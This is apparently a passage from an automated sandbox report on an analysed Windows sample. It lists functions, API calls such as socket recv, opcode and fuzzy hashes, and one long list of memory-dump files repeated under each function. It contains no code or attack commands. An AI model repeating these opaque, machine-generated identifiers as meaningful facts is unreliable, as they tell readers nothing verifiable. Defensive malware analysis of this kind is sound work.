                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$bZ+,
                                                                                                                                                                                                                                                  • API String ID: 4168288129-3263474782
                                                                                                                                                                                                                                                  • Opcode ID: cc94573c6298d2baeec4e0f1d37a2a66359e662b76945dd78504434283f24385
                                                                                                                                                                                                                                                  • Instruction ID: 114d690062fbf0243ce87293392b4c1776bcf0962b14407ccc7fe8ccf7c78bef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc94573c6298d2baeec4e0f1d37a2a66359e662b76945dd78504434283f24385
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24C24F72E046289FDB25CE28DD407E9B7B5EB44314F1481EBD84DE7240E779AE81AF42
                                                                                                                                                                                                                                                  Function 00F3E0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000004,00000000), ref: 00F3E10B
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000008,00000000), ref: 00F3E140
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 1507349165-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: f26d30c0af3b030ad28ca076127a67a861081e8944022f67c550ebc637422ced
                                                                                                                                                                                                                                                  • Instruction ID: 8f95e81595bb770a1cad4693a5ebb559bdaa6d3ee3d626b370247e1e40e46f7f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f26d30c0af3b030ad28ca076127a67a861081e8944022f67c550ebc637422ced
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1431C771E002489BD720DB6CDC81BAB7BB8EF09734F050626E914E72D1D675A8499BA0
                                                                                                                                                                                                                                                  Function 00F72D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                  • Instruction ID: 405717fa29ffa73aeba8bd1093e14f8f6b1b04e5eb87ec9db2b4504807b19bca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F13F71E002199FDF14CFA8C8806ADF7B1FF48324F25826AD919AB345D731AE41DB91
                                                                                                                                                                                                                                                  Function 00F4CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00F4CF52,?,00000003,00000003,?,00F4CF87,?,?,?,00000003,00000003,?,00F4C4FD,00F32FB9,00000001), ref: 00F4CC03
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1802150274-0
                                                                                                                                                                                                                                                  • Opcode ID: b8c89fdf34186c814635727490ac9983b62bca2d76f875d99da1b6b3d4705559
                                                                                                                                                                                                                                                  • Instruction ID: 8ca4c608cf017a0605f1a7c156777756a44f08293fa69baac85478a9e7b9a1d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8c89fdf34186c814635727490ac9983b62bca2d76f875d99da1b6b3d4705559
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBD02232A4303CA7CB422BD5FC088EDBF4C9E00F203051012EE0853120CB516C007BD1
                                                                                                                                                                                                                                                  Function 00F34B30 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
